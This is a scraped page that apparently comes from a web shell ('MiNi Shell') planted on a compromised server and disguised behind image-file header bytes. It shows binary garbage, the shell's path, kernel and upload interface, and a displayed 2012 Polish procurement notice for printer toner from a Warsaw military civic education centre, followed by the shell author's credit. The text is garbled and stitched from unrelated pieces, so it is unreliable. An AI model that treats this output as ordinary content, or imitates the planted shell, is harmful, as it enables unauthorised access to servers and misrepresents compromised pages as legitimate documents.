JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120614/130503-N-2012.html

<p class="kh_header"><b>Warszawa: DOSTAWA TUSZY  I TONERÓW, ZP-22_2012</b><br>
<b>Numer ogłoszenia: 130503 - 2012; data zamieszczenia: 14.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowe Centrum Edukacji Obywatelskiej , ul. Stefana Banacha 2, 00-909 Warszawa, woj. mazowieckie, tel. 22 6824-913, faks 22 6824559.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wceo.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA TUSZY  I TONERÓW, ZP-22_2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w prowadzonym postępowaniu o udzielenie zamówienia publicznego jest dostawa tuszy i tonerów do drukarek i urządzeń wielofunkcyjnych w podziale na 3 części. 


Część 1. Dostawa tuszy tonerów dla WCEO:

Lp.	Nazwa artykuły		JM	Ilość
1	Toner CE505A do drukarek HP LJ 2030/2035		szt.	 6
2	Toner C7115A do drukarek HP LJ 1200		szt.	 4
3	Toner C7115X do drukarek HP LJ 1200		szt.	 4
4	toner do HP CB540A		szt.	 5
5	toner do HP CB541A		szt.	 5
6	toner do HP CB542A		szt.	 5
7	toner do HP CB543A		kpl	 5
8	Toner Q2612A do drukarek HP LJ 3015,1012,3030,1020	szt.	 8
9	Toner Q2613A do drukarek HP LJ 1300		szt.	 3
10	Toner Q2613X do drukarek HP LJ 1300		szt.	 3
11	Toner Q2670A do drukarek HP LJ 3500		szt.	 1
12	Toner Q2671A do drukarek HP LJ 3500		szt.	 1
13	Toner Q2672A do drukarek HP LJ 3500		szt.	 1
14	Toner Q2673A do drukarek HP LJ 3500		szt.	 1
15	Toner Q5949A do drukarek HP LJ 1160,1320		szt.	 3
16	Toner Q5949X do drukarek HP LJ 1060,1320		szt.	 2
17	Toner Q6000A do drukarek HP LJ 1600/2605		szt.	 2
18	Toner Q6001A do drukarek HP LJ 1600/2605		szt.	 2
19	Toner Q6002A do drukarek HP LJ 1600/2605		szt.	 2
20	Toner Q6003A do drukarek HP LJ 1600/2605		szt.	 2
21	Toner Q6470A Black do drukarek HP LJ 3600/3800	szt.	 1
22	Toner Q6471A Cyan do drukarek HP LJ 3600		szt.	 1
23	Toner Q6472A Yellow do drukarek HP LJ 3600		szt.	 1
24	Toner Q6473A Magenta do drukarek HP LJ 3600	szt.	 1
25	Toner Q7553A do drukarek HP LJ 2015		szt.	 2
26	Toner Q7581A Cyan do drukarek HP LJ 3800		szt.	 1
27	Toner Q7582A Yellow do drukarek HP LJ 3800		szt.	 1
28	Toner Q7583A Magenta do drukarek HP LJ 3800	szt.	 1
29	Tusz 51645AE (45) do drukarek HP LJ 990cxi		szt.	 6
30	Tusz C6578D (78)kolor do drukarek HP PSC 950	szt.	 6
31	Tusz C6656AE do drukarek HP DJ 450/5150		szt.	 2
32	Tusz C6657A do drukarek HP DJ 5150, PSC 1350	szt.	 2
33	Tusz C8727AE do dukarek HP DJ 3550		szt.	 2
34	Tusz C8728AE do dukarek HP DJ 3550		szt.	 2
35	Toner 1382A003[AA] do kserokopiarki CANON NP6512	szt.	 2
36	Taśma EPSON C13S015020 (#8755) do drukarek FX-1170/1180 szt.	 5
37	Taśma do maszyny do pisania, Taśma nylonowa - Optima SC 18 / SP 20 / SP 20.1 / SP 20.2 / SP 22.1 / SP 22B / SP 22BM / SP 23 / SP 24 / SP 26		szt.	 3
 
Szczegółowe opisy załączniku nr 1 do SIWZ i w załączniku nr 4 do SIWZ - projekcie umowy.


Część 2. Dostawa tuszy i tonerów dla RZA WP

Lp.	Nazwa artykułu	J.m.	Ilość
1	Toner C-EXV-14 do kserokopiarki Canon iR 2016J	9 szt.

Szczegółowe opisy  w załączniku nr 1 do SIWZ i w załączniku nr 4a do SIWZ - projekcie umowy.


Część 3. Dostawa tuszy i tonerów dla CBW

Lp.	Nazwa artykułu				JM	Ilość
1	Toner Rico 841453-yellow do drukarki REX ROTARY MPC 4000	szt.	 2
2	Toner Rico 841287-cyan do drukarki REX ROTARY MPC 4000	szt.	 2
3	Toner Rico 841454-magenta do drukarki REX ROTARY MPC 4000	szt.	 1
4	Toner Rico 841284-black do drukarki REX ROTARY MPC 4000	szt.	 1

Szczegółowe opisy  w załączniku nr 1 do SIWZ i w załączniku nr 4b do SIWZ - projekcie umowy.

1.	Asortyment, w tym elementy wchodzące w jego skład muszą być fabrycznie nowe, tzn. takie, do produkcji których nie użyto składników poprzednio używanych, bez śladów uszkodzenia, pełnowartościowe, nie uzupełniane, nie przerabiane, nie regenerowane, ani nie prefabrykowane.

2.	Zamawiający dopuszcza składanie ofert równoważnych  w zakresie wydajności/ pojemności (wskazanej w kol. nr 4 załącznika nr 1do SIWZ).


3.	Zaoferowany asortyment (każdy egzemplarz) musi być:

a)	wolny od wad uniemożliwiających jego użycie zgodnie z przeznaczeniem;

b)	kompatybilny ze sprzętem wskazanym w kol. nr 2 załącznika nr 1 do SIWZ, tj. nie może ograniczać funkcji i możliwości sprzętu, w tym nie może ograniczać pełnej współpracy z programem monitorującym stan zasobników z tuszem lub tonerem;

c)	gwarantować jakość wydruku, szybkość schnięcia oraz kolorystykę nie gorszą niż odpowiednie materiały eksploatacyjne produkowane lub firmowane przez producenta fabrycznie opakowany w sposób chroniący kasetę z tonerem po wyjęciu z opakowania zewnętrznego. Każda kaseta z tonerem musi ponadto posiadać zabezpieczenie umożliwiające rozpoznanie, czy materiał eksploatacyjny był otwierany/używany;

d)	oznakowany kodem producenta umożliwiającym jednoznaczną identyfikację producenta oraz typ materiału eksploatacyjnego. Oznaczenia muszą być trwale umieszczone na opakowaniach zewnętrznych oraz bezpośrednio na kasecie z tonerem. Ponadto na opakowaniu musi znajdować się wykaz urządzeń kompatybilnych z oferowanym asortymentem;

e)	wyprodukowany zgodnie z normą ISO 9001 oraz ISO 14001.

4.	Pod nazwą producenta należy rozumieć firmę, pod nazwą której sprzedawany jest zaoferowany asortyment, bądź przedsiębiorcę wprowadzającego asortyment do obrotu na terenie Rzeczypospolitej Polskiej.

5.	Zaoferowany asortyment musi posiadać termin ważności/trwałości nie krótszy niż 24 miesiące, licząc od daty podpisania protokołu odbioru.

6.	Na dostarczony asortyment Wykonawca zobowiązany będzie udzielić:
a)	minimum 12 miesięcznej rękojmi za wady,
b)	gwarancji obejmującej okres minimum 12 miesięcy,
        - liczony od dnia podpisania bez uwag protokołu odbioru. W przypadku, gdy gwarancja producenta będzie krótsza od minimalnej wymaganej przez Zamawiającego, jako wiążąca dla Stron będzie gwarancja udzielona przez Wykonawcę.
CPV:  	30 12 50 10-2 -  Tonery do drukarek laserowych/faksów
CPV: 	30 12 40 00-4 -   Części i akcesoria do maszyn biurowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.50.10-2, 30.12.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia wraz z ofertą: oświadczenia o spełnianiu warunków udziału w postępowaniu, (zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia wraz z ofertą: oświadczenia o spełnianiu warunków udziału w postępowaniu, (zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia wraz z ofertą: oświadczenia o spełnianiu warunków udziału w postępowaniu, (zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia wraz z ofertą: oświadczenia o spełnianiu warunków udziału w postępowaniu, (zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda złożenia wraz z ofertą: oświadczenia o spełnianiu warunków udziału w postępowaniu, (zał. nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca przy oferowaniu materiałów równoważnych obowiązany jest do dołączenia do oferty wskazanych poniżej dokumentów (zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, (Dz. U. Nr 226, poz. 1817):

a.	Aktualny katalog (wyciąg z katalogu) lub wydruk z katalogu umieszczonego na stronie internetowej z zaznaczeniem oferowanego asortymentu. Katalogi produktów równoważnych muszą zawierać specyfikację techniczną (np. kartę charakterystyki) produktu równoważnego z zaznaczeniem parametrów (co najmniej pojemności/wydajności) potwierdzających równoważność oferty. W przypadku braku katalogu oraz w odniesieniu do asortymentu niewystępującego w katalogach konieczne jest dołączenie spisu wraz z fotografią wszystkich pozycji oferowanego asortymentu z podaniem producentów oraz informacji indywidualizujących zaoferowany asortyment, wraz ze specyfikacją techniczną (np. kartą charakterystyki) produktu równoważnego z zaznaczeniem parametrów potwierdzających równoważność oferty. Ze złożonych dokumentów ma jednoznacznie wynikać, których pozycji asortymentowych dany dokument dotyczy;

b.	Dokumenty potwierdzające, że oferowany asortyment jest produkowany zgodnie z normą ISO 9001 oraz ISO 14001;

c.	Oświadczenie Wykonawcy o spełnianiu przez oferowane materiały eksploatacyjne wymagań Zamawiającego (wzór stanowi załącznik nr 5 do SIWZ).</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na warunkach określonych w projekcie umowy (załącznik nr 4 dla cz 1, 4a dla cz 2, 4b dla cz. 3, do SIWZ)
2.	Zamawiający, w sytuacji uzasadnionej zmianą przepisów prawa, wystąpieniem okoliczności niespowodowanych zawinionym działaniem lub zaniechaniem którejkolwiek ze stron umowy, nieotrzymania przez Zamawiającego środków finansowych, koniecznych do realizacji niniejszej umowy, przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:

a)	zmniejszenia zakresu przedmiotu umowy;
b)	zmiany terminu wykonania umowy;
c)	zmiany osób i podwykonawców, przy pomocy, których Wykonawca realizuje przedmiot umowy;
d)	zmiany warunków płatności.
3.	Zmiana umowy, z wyjątkiem zmiany dotyczącej osób realizujących umowę, musi być dokonana za porozumieniem stron w formie pisemnego aneksu.
4.	Wszelkie zmiany wprowadzone do umowy z naruszeniem pkt 3 niniejszego rozdziału nie będą wiążące dla żadnej ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// www.wceo.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WOJSKOWE CENTRUM EDUKACJI OBYWATELSKIEJ, POK 15A
ul. Stefana Banacha 2 00-909 Warszawa 60.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2012 godzina 09:30, miejsce: WOJSKOWE CENTRUM EDUKACJI OBYWATELSKIEJ, POK 313-KANCELARIA JAWNA WCEO
ul. Stefana Banacha 2 00-909 Warszawa 60.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1. Dostawa tuszy tonerów dla WCEO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1. Dostawa tuszy tonerów dla WCEO:

Lp.	Nazwa artykuły		JM	Ilość
1	Toner CE505A do drukarek HP LJ 2030/2035		szt.	 6
2	Toner C7115A do drukarek HP LJ 1200		szt.	 4
3	Toner C7115X do drukarek HP LJ 1200		szt.	 4
4	toner do HP CB540A		szt.	 5
5	toner do HP CB541A		szt.	 5
6	toner do HP CB542A		szt.	 5
7	toner do HP CB543A		kpl	 5
8	Toner Q2612A do drukarek HP LJ 3015,1012,3030,1020	szt.	 8
9	Toner Q2613A do drukarek HP LJ 1300		szt.	 3
10	Toner Q2613X do drukarek HP LJ 1300		szt.	 3
11	Toner Q2670A do drukarek HP LJ 3500		szt.	 1
12	Toner Q2671A do drukarek HP LJ 3500		szt.	 1
13	Toner Q2672A do drukarek HP LJ 3500		szt.	 1
14	Toner Q2673A do drukarek HP LJ 3500		szt.	 1
15	Toner Q5949A do drukarek HP LJ 1160,1320		szt.	 3
16	Toner Q5949X do drukarek HP LJ 1060,1320		szt.	 2
17	Toner Q6000A do drukarek HP LJ 1600/2605		szt.	 2
18	Toner Q6001A do drukarek HP LJ 1600/2605		szt.	 2
19	Toner Q6002A do drukarek HP LJ 1600/2605		szt.	 2
20	Toner Q6003A do drukarek HP LJ 1600/2605		szt.	 2
21	Toner Q6470A Black do drukarek HP LJ 3600/3800	szt.	 1
22	Toner Q6471A Cyan do drukarek HP LJ 3600		szt.	 1
23	Toner Q6472A Yellow do drukarek HP LJ 3600		szt.	 1
24	Toner Q6473A Magenta do drukarek HP LJ 3600	szt.	 1
25	Toner Q7553A do drukarek HP LJ 2015		szt.	 2
26	Toner Q7581A Cyan do drukarek HP LJ 3800		szt.	 1
27	Toner Q7582A Yellow do drukarek HP LJ 3800		szt.	 1
28	Toner Q7583A Magenta do drukarek HP LJ 3800	szt.	 1
29	Tusz 51645AE (45) do drukarek HP LJ 990cxi		szt.	 6
30	Tusz C6578D (78)kolor do drukarek HP PSC 950	szt.	 6
31	Tusz C6656AE do drukarek HP DJ 450/5150		szt.	 2
32	Tusz C6657A do drukarek HP DJ 5150, PSC 1350	szt.	 2
33	Tusz C8727AE do dukarek HP DJ 3550		szt.	 2
34	Tusz C8728AE do dukarek HP DJ 3550		szt.	 2
35	Toner 1382A003[AA] do kserokopiarki CANON NP6512	szt.	 2
36	Taśma EPSON C13S015020 (#8755) do drukarek FX-1170/1180 szt.	 5
37	Taśma do maszyny do pisania, Taśma nylonowa - Optima SC 18 / SP 20 / SP 20.1 / SP 20.2 / SP 22.1 / SP 22B / SP 22BM / SP 23 / SP 24 / SP 26		szt.	 3
 
Szczegółowe opisy załączniku nr 1 do SIWZ i w załączniku nr 4 do SIWZ - projekcie umowy.
CPV:  	30 12 50 10-2 -  Tonery do drukarek laserowych/faksów
CPV: 	30 12 40 00-4 -   Części i akcesoria do maszyn biurowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.50.10-2, 30.12.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2. Dostawa tuszy i tonerów dla RZA WP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	J.m.	Ilość
1	Toner C-EXV-14 do kserokopiarki Canon iR 2016J	9 szt.

Szczegółowe opisy  w załączniku nr 1 do SIWZ i w załączniku nr 4a do SIWZ - projekcie umowy.


CPV:  	30 12 50 10-2 -  Tonery do drukarek laserowych/faksów
CPV: 	30 12 40 00-4 -   Części i akcesoria do maszyn biurowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.50.10-2, 30.12.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3. Dostawa tuszy i tonerów dla CBW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu				JM	Ilość
1	Toner Rico 841453-yellow do drukarki REX ROTARY MPC 4000	szt.	 2
2	Toner Rico 841287-cyan do drukarki REX ROTARY MPC 4000	szt.	 2
3	Toner Rico 841454-magenta do drukarki REX ROTARY MPC 4000	szt.	 1
4	Toner Rico 841284-black do drukarki REX ROTARY MPC 4000	szt.	 1
Szczegółowe opisy  w załączniku nr 1 do SIWZ i w załączniku nr 4b do SIWZ - projekcie umowy.
CPV:  	30 12 50 10-2 -  Tonery do drukarek laserowych/faksów
CPV: 	30 12 40 00-4 -   Części i akcesoria do maszyn biurowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.50.10-2, 30.12.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com